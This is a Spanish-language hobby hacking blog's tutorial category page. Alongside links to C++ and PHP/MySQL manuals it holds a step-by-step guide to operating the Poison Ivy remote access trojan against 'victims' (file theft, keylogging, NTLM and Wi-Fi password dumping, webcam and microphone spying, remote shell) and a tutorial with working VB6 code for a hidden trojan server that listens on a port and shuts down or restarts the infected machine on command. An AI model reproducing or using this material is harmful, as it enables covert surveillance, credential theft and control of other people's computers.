Archivos de la categoría ‘Tutoriales’

Tutorial C++

Publicado: abril 15, 2012 de nachocp en Tutoriales
Etiquetas:, , , , ,

Hola;

Bien ya que estoy ahora mismo muy metido en temas de programación os paso este tutorial de c++ que , para mi es muy interesante.

 

Tutorial C++

 

salu2

Manual de PHP+MySql

Publicado: junio 4, 2011 de nachocp en Tutoriales
Etiquetas:, , , ,

Bueno aquí os traigo un manual de php+mysql que saqué de forosdelweb. (los derechos son suyos ) En el manual se explica lo básico de php y mysql.

 

Aquí os lo pongo: 

http://www.megaupload.com/?d=QB5OTQE3

Uso o manual del Poison Ivy

Publicado: abril 26, 2011 de nachocp en Hacking básico., Hacking., Tutoriales
Etiquetas:, , , , , , ,

Hola señores:

Este es un manual muy interesante que encontre en programas-hack.com muy interesante sobre este software espero que les guste.

Cita:

Empezado por wikipedia

os troyanos de conexión inversa son los que hacen que el servidor sea el que se conecte al cliente; las ventajas de éste son que traspasan la mayoría de los firewall y pueden ser usados en redes situadas detrás de un router sin problemas.

bueno, comenzamos, para empezar, nuestro lugar de trabajo XD, cuando abrimos el poison ivy, vemos esto…

ID:muestra el nombre que le dimos a la victima.
WAN:muestra la IP de internet de la victima.
LAN:muestra la IP de red de la victima.
Computer: muestra el nombre de la PC de la victima.
User Name: muetra el nombre del usuario activo en la PC de la victima.
Acc. Type:muestra el tipo de sesion que esta activo en la PC de la victima.
OS: muestra el sistema operativo (operating system)(Windows 98, ME, 2000, XP, Linux, etc)
CPU:nos dira la cantidad de megahertz (MHz) que tiene el procesador de la PC de la victima.
RAM:nos dira la cantidad de memoria RAM que posee la PC de la victima.
Version:indica la version del server que tiene instalada la victima.
Ping:indica la velocidad de conexion con la victima. entre mas alto es el numero, mas dificil es la conexion
Port: xxxx :indica el puerto que estamos escuchando.
Connection: xx :indica la cantidad de conexiones que tenemos.

bueno, esto en general de la ventana del poison, ahora damos doble clic sobre la victima, y nos aparecera otra ventana…

primero tenemos la ventana information

aca aparece la informacion sobre la PC y sobre el server que
estamos utilizando…

luego tenemos en Manager, Files…
sirve para ver todos archivos en la PC de la victima…

con esta opcion podemos refresar la ventana, buscar archivos o carpetas, ver iconos grandes, subir archivos o carpetas, descargar archivos o carpetas, ejecutar archivos de forma visible u oculta, renombrar archivos o carpetas, borrar archivos normalmente o de manera segura. esto es util por ejemplo si keremos robar un archivo o si keremos ejecutar algun otro virus en la PC infectada..

luego tenemos en manager, Search
sirve para buscar archivos en la PC de la victima

explico:
File name: aqui va el nombre del archivo.
A word in the file: si no sabemos el nobmre, escribimos alguna palabra ke contenga
Search in: donde buscar
Include subdirectories: opcion para que busque en los subdirectorios de la busqueda
Fuzzy: si la seleccionamos, va a encontrar cualquier archivo que contenga nuestra palabra de busqueda.
Case sensitive: para que mayusculas y minusculas coincidan
Search:comenzar busqueda
Stop:detener busqueda

luego tenemos en manager, regedit
sirve para acceder a los registros de la PC infectada

luego en manager, tenemos regedit-search
sirve para buscar un registro en especifico y se usa de la misma manera que el buscador de archivos, solo se le agregan las opciones valores y claves

ahora esta la opcion processes, donde miramos los procesos de la victima
con el boton derecho podemos refrescar, matar procesos, suspender procesos y guardar un archivo

ahora tenemos la opcion services, que sirve para ver los servicios que esta utilizando la PC infectada

con el clic derecho podemos:
refrescar, guardar a un archivo, iniciar o detener un servicio, editar, instalar y desinstalar servicios.

luego tenemos la opcion installed aplications, que nos muestra los programas instalados en la PC infectada…

aqui con el clic derecho podemos refrescar la ventada, desinstalar una aplicacion o guardar un archivo

ahora vamos con windows, que es donde estan todas las ventanas en uso

con esta opcion podemos refrescar, capturar la ventana, enviar teclas para que sean presionadas en la PC remota, mostrar la ventana en la PC remota, esconder la ventana, maximizar, minimizar y cerrar la ventana.

bueno, ahora pasamos a tools, lo primero que tenemos ahi es relay
esta opcion nos sirve para ver y manipular el trafico entre los diferentes proxys y servers. Esta opcion es valida si nosotros agregamos algun servidor intermedio cuando configuramos el server (en Socks4).

Se pueden capturar passwords, nombres de usuario e informacion que hayan quedado registrados a lo largo de la conexion que establecimos a traves de los proxys. Tambien tiene opciones de filtro, para que no aparezca informacion que no queramos.

luego de esto tenemos la opcion Active ports
sirve para ver que puertos TCP y UDP estan abiertos en la PC de la victima. Es lo mismo que hacer un netstat

con el clic derecho en esta opcion podemos refrescar, guardar a un archivo, resolver el DNS, capturar paquetes, matar la conexion y matar el proceso.

luego esta la opcion remote shell
sirve para manejar la consola MS-DOS de la PC infectada

Para activarla hay que hacer clic derecho y elegir la opcion “Activate”. Tambien podemos guardar el registro a un archivo y limpiar la ventana

luego vamos con la opcion passwords audits, ahi tenemos tres opciones Cached, NT/NTLM Hashes y Wireless
primero Cached, son los passwords ke kedan en los exploradores y mensajeros (creo)

NT/NTLM Hashes, me parece que son los passwords de windows ^^

y Wireless, los passwords de las conexiones wireless ke ha usado la PC infectada

———-
bueno, ahora pasamos a surveillance empezando por keylogger
este es el que capta todas las pulsaciones de teclas que se han hecho n la PC infectada, ideal para robar password

luego tenemos audio capture, para escuchar lo que escucha la victima

luego esta screen capture, que puede servir como un escritorio remoto

Stretch:sirve para ajustar la pantalla de la victima a la ventana.
Mouse:sirve para manejar el mouse de la victima y poder clickear en donde queramos.
Keyboard:sirve para manejar el teclado de la victima y poder escribir en donde queramos.
Interval:es el intervalo de tiempo en que se toma una y otra captura.
Start:comienza a capturar pantallazos seguidamente.
Single:captura un unico pantallazo.
Save:sirve para guardar la pantalla en un archivo. Si seleccionamos “Autosave” se guardaran todas las que se capturen.
Options:sirve para cambiar el tamaño y la calidad de la pantalla.

y por ultimo webcam capture que captura imagenes a travez de la webcam de la victima ^^

funciona de la misma manera que screen capture

luego en la seccion plug ins, donde iran todos los plug ins ke le instalemos al troyano, nos viene la opcion port scanner 1.0.0 que sirve para escanear remotamente los puertos abiertos de la PC infectada

luego en las opciones de administracion encontramos
Edit ID: que sirve para cambiar el nombre de la victima que aparece cuando se conecta con nosotros

share: que sirve para agregar otra ip o servidor de no-ip y asi compartir al conexion de la victima con alguien

DNS/Port: aca agregaremos la nueva IP o dominio NO-IP.
ID: el nombre con el que se conectara la victima en ese nuevo dominio.
Password: la clave del server en ese nuevo dominio.
Socks4:si se quieren agregar proxys o servidores intermedios.
Run in Same Process/New Process: para que el server se ejecute en el mismo proceso o uno nuevo.
Privileges: para que el server compartido tenga los permisos apropiados. Full (el server compartido tiene acceso a todas las opciones), Normal (al server compartido no se le esta permitido cambiar opciones de administracion del server), Restricted (al server compartido no se le esta permitido utilizar opciones peligrosas).

Update: actualizar el server a uno nuevo que hayamos creado.

Restart: resetear el server.

Uninstall: desinstalar el server.

espero este tutorial le haya servido de algo a alguien XD… comentarios, puteadas, halagos, insultos, todo aca ^^

Bien este proyecto de  blog lo comencé hace unos pocos meses y bueno ha crecido bastante ahora me propongo hacerlo crecer más añadiendo un foro para la comunidad.

http://hackerpedia.phpbb-foro.net

También busco moderadores para el foro salu2.

Manual de PHP y MySql

Publicado: abril 19, 2011 de nachocp en Tutoriales
Etiquetas:, , , , , ,

Bien este es un pdf creado por mi en el cual meti un gran Faq creado por forosdelweb en el que te enseña mucho sobre PHP y MySql.

Espero que les guste:

http://www.megaupload.com/?d=8NE3DJLI

Ide de javascript online

Publicado: abril 18, 2011 de nachocp en Hacking básico., Hacking., Tutoriales
Etiquetas:, , ,

TIDE 2.0 es un IDE para javascript  online que te puede ser de utilidad si eres desarrollador web para probar tus codigos javascript.

ide javascript

TIDE cuenta con un depurador de codigo y permite definir variables para verificar su comportamiento. Ademas algo muy interesante de TIDE es que contiene varios snippets de codigo javascript  que nos pueden eficientar nuestrotrabajo.

EnlaceTIDE 2.0

Como hacer un troyano en VB6

Publicado: marzo 21, 2011 de nachocp en Tutoriales

Bien este es un tema que aún no se ha tratado en el Blog pero creo que es interesante:

¿Como crear un troyano?

Bueno, supongo que sabréis lo que es un troyano ¿no?. Un troyano es como dice su historia algo malo camuflado en algo bueno.

 

¿Qué inteción tiene un troyano?

Pues desde una broma,recoger información de un PC, formatearlo , espiarle…

 

¿Qué lenguaje puedo usar para hacer un troyano?

C++ quien diga lo contrario miente , eso si en VB está muy bien también (VisualBasic lenguaje Basic)

 

Asi que aquí va un tutorial de como hacerun troyano en VB6 pondré el link para la descarga del VB6 que está dificil de encontar.

 

La guía no es mía pero esta bien tengo que revisarla:

 

 

Buenas antes que nada , decir… a los lammers que no se dediquén a copiar código… y se dediquén a entenderlo. En este manual explicaré como crear troyanos en visual Basic….
un troyano es una aplicacoón que se basa en el tan conocido Cliente/Servidor y que se trata de enviar datos desde un ordenador a otro Manteniendo una comunicación…
En este caso en Nuestro troyano usaremos el protocolo TCP.

usaremos el programa visual basic 6.0 ( recomendado )
Bien empesemos con el aspecto gráfico del troyano….
Podnremos tres opciones a nuestro querido cliente…
1.) Apagar equipo 2.) Reiniciar equipo..
estas opciones son muy sensillas…
¿Por qué no pongo más ejemplos?
Por que siempre hay alguien que se dedica a aprovecharse de estos manuales para hacer lammeradas… en cambio otras personas lo hacen con fines productivos y educativos…
Bien… Empesaremos a programar el aspecto Gráfico del cliente…
Abramos el visual basic 6.0
y Agregamos el control Winsock que se encuentre en: proyecto >>> componentes >>>
y lo agregamos al formulario…
Agregamos:
1 Textbox (text1.text ) 2 Labels (label1 y label2) 4 CommandButton…
en el primer label Pondremos en la propiedad caption lo siguiente:
Host o Dirección IP:
y al lado ponemos el textbox…. aquí es donde se introducirá la IP de la víctima cuando la infectemos….
en el segundo label es donde ubicaremos el Estado de la conexión…
Por defecto ponemos en el caption:
Estado: Desconectado…
CommandButton1:
Sería el botón Conectar…
CommandButton2:
Desconectar…
CommandButton3:
Apagar equipo…
CommandButton4:
Reiniciar equipo…

En el botón Conectar pondremos el siguiente Código……
Winsock1.Close (para que pueda volver a conectar en caso de desconectarte) Winsock1.RemoteHost = Text1.text (Aquí estamos diciendo que el host remoto será lo introducido en el textbox ) Winsock1.RemotePort = 8721 (especificamos el puerto.. en este caso.. el 8721) Winsock1.Connect (Conecta)
en el botón desconectar pondremos lo siguiente…
Winsock1.Close

luego en el evento Connect del winsock haremos esto:
Private Sub winsock1_connect() If Winsock1.State = sckConnected Then Label2.caption = “Conectado” End If End Sub
en el botón Apagar añadimos el siguiente código…
Winsock1.SendData “apa”

en el botón reiniciar añadimos:
Winsock1.SendData “rei”

################################                          server
#################################

Ahora empesaremos con el server….
Agregamos el control winsock al formulario…
y le ponemos la propiedad visible en false en el formulario….
luego en el winsock en la propiedad LocalPort ponemos 8721
añadimos un textbox (text1.text ) que será la comprobación de texto desde el cliente….
y añadimos esto en el evento load del formulario.

MsgBox “Caistes en mis manos” Winsock1.Listen ‘ El programa se pone a la escucha… WAClase = “VBE” End Sub

luego:
Private Sub Winsock1_ConnectionRequest(ByVal RequestID As Long) Winsock1.Close Winsock1.Accept RequestID (aceptamos conexiones) End Sub Private Sub Winsock1_DataArrival(ByVal bytestotal As Long) Dim datos As String ( declaramos la variable datos ) Winsock1.GetData datos ( hacemos que todo lo que recibamos se almacene en la variable datos ) Text1.Text = datos ( el textbox es lo que recibamos ) End Sub
luego en el evento change del textbox
Private Sub Text1_Change() if text1.text = “apa” Then Shell (“cmd.exe /c shutdown -s -t 1” end if If Text1.Text = “rei” Then Shell (“cmd.exe /c shutdown -r -t 2”, vbHide End If

Hasta aquí llega mi manual…. el troyano es muy básico.. pero si entendistes la lógica seguro que lo podrás mejorar mucho.

Cualquier error… diganmelo…